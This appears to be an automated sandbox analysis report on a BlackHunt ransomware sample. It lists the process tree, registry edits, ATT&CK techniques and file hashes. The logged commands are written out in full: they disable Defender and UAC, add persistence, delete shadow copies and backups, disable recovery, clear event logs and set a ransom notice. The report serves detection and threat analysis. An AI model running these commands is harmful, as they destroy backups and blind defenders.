description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe"C:\Users\Admin\AppData\Local\Temp\b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2352 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:2528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2668
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2576
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2940
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2524
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2536
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2452
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2544
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2984
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2108
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1644
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1572
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1352
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1612
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1884
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1616
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1320
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2472
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1684
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2424
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2652
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1776
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2624
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2888
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2832
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:932
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe" /F2⤵PID:2712
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe" /F3⤵
- Creates scheduled task(s)
PID:696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2520
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2076
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1972
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:528
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1112
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1648
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2416
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1188
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2264
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:844
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3932
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3500
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3208
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:2152
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:2084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3836
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2940
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2760
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3396
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3288
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3556
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1732
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1116
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:1660
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:3816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:2460
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:3308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:1412
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:2128
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:1928
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2724
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:4012
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe"2⤵
- Deletes itself
PID:2000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3924
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3384
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3388
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:3124
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2116
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:2496
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:1208
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:1840
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "3244927468479233491665449365-971075283-371473172-20402228163938972681678029581"1⤵
- Modifies registry class
PID:2528
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1644
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2416
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2112
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:2776
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵
- Enumerates connected drives
PID:3076
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:3176
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:3212
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:3564
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4004
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 51⤵
- Runs ping.exe
PID:3360
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b33cd7ac3a40dd5d380184302d921dfd
SHA133f53b62088fb76cdba82f9652447ecb6b2904be
SHA256673b1c85037cae0057b935c3ae871c48c5bf6c009d83afc5087cb6d77172cb4a
SHA5124ce4497f750c1078b31c5f607f5999c4a0e0052ccd1e3570db9d3d4d996aee4ff0b48b93735c46eb1b129115371311cae14dbbfbd593d5f9d99fa452d557166a
-
Filesize
12KB
MD5357a150975ba9ba1170047bacab37d16
SHA1cf871fe92fda4e382d9d58cc3bb1b0cb410ac593
SHA256d71eb4ccd5dbbfe9a3c3aca5f0f348e8e34b2843365bdf27f071768176518993
SHA512cde1350f85b94e558238329aa0a110dbee6cc2cfcb1ce8ee0679f852df10dc3e181ce1508cafe3a4702e786ead43804fccfe17f4e954feca5aee7a90325c8bce
-
Filesize
684B
MD5d2a2f2e19bf7cd99da1db4799389b48d
SHA180d8f25b55dca5c461bb4989f685949c5f789176
SHA2569eca2655c28c0db4e1fe370a436d771985a9ecbffd5597fee61a6c6ba4e0771e
SHA512d91473be3d23f72605a83fc279997f68fe5e6ab7024bf8d5608669a229a7752f7530ac54f5358b7e3452cd1ec747be065d876ef0f274c345f6ab4a31e34c6f3e